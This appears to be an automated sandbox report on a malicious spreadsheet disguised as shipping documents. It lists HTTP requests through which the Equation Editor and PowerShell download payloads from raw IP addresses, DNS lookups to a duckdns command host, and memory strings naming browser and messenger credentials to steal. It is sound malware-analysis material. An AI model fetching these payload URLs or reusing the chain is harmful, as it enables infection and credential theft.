Source: global traffic	HTTP traffic detected: GET /59/bn/createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd.doc HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.45.34Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /59/createdthingstobefrankwithmeeverywhere.gIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.45.34Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /59/LMTS.txt HTTP/1.1Host: 104.168.45.34Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: bhv4625.tmp.18.dr	String found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
Source: RegAsm.exe, 00000015.00000002.476526018.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.476526018.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: RegAsm.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bhv4625.tmp.18.dr	String found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: RegAsm.exe, 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: RegAsm.exe, 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: hq.ax
Source: global traffic	DNS traffic detected: DNS query: shortify.pro
Source: global traffic	DNS traffic detected: DNS query: iwarsut775laudrye2.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net
Source: global traffic	DNS traffic detected: DNS query: asociatiatraditiimaria.ro
Source: global traffic	DNS traffic detected: DNS query: new.quranushaiqer.org.sa

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 26 Jul 2024 11:03:02 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkeddate: Fri, 26 Jul 2024 11:03:08 GMTserver: LiteSpeed

Source: powershell.exe, 0000000C.00000002.460357536.0000000009268000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://104.168.45.34
Source: powershell.exe, 0000000C.00000002.460357536.00000000091D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://104.168.45.34/59/LMTS.txt
Source: EQNEDT32.EXE, 0000000A.00000002.439305634.000000000026F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIF
Source: EQNEDT32.EXE, 0000000A.00000002.439305634.000000000026F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIFj
Source: powershell.exe, 0000000C.00000002.453941853.00000000022FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://198.46.176.133
Source: powershell.exe, 0000000C.00000002.453941853.00000000022FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://acdn.adnxs.com/ast/ast.js
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://b.scorecardresearch.com/beacon.js
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000011.00000003.472363869.0000000000533000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.472200136.0000000000535000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.472315652.0000000000533000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.472467537.0000000000533000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.473099376.0000000000533000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.17.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000011.00000002.479570432.000000000049D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.479056321.000000000049D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabp
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.957434022.0000000000751000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.957434022.0000000000735000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 0000000C.00000002.453767523.000000000047C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.c
Source: hq.ax.url.3.dr	String found in binary or memory: http://hq.ax/
Source: waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls, Oi8.url.3.dr	String found in binary or memory: http://hq.ax/Oi8
Source: 1E630000.0.dr, ~DFBD4D1EC3A255F639.TMP.0.dr	String found in binary or memory: http://hq.ax/Oi8yX
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: powershell.exe, 00000016.00000002.958799060.0000000002A89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://new.quranushaiqer.org.sa
Source: powershell.exe, 0000000C.00000002.454070604.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exe, 00000011.00000002.479629076.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.478879483.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.476367816.0000000000491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.965643789.0000000004F12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
Source: powershell.exe, 0000000C.00000002.453941853.00000000021C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.958799060.0000000002705000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.958702628.0000000002701000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
Source: bhv4625.tmp.18.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
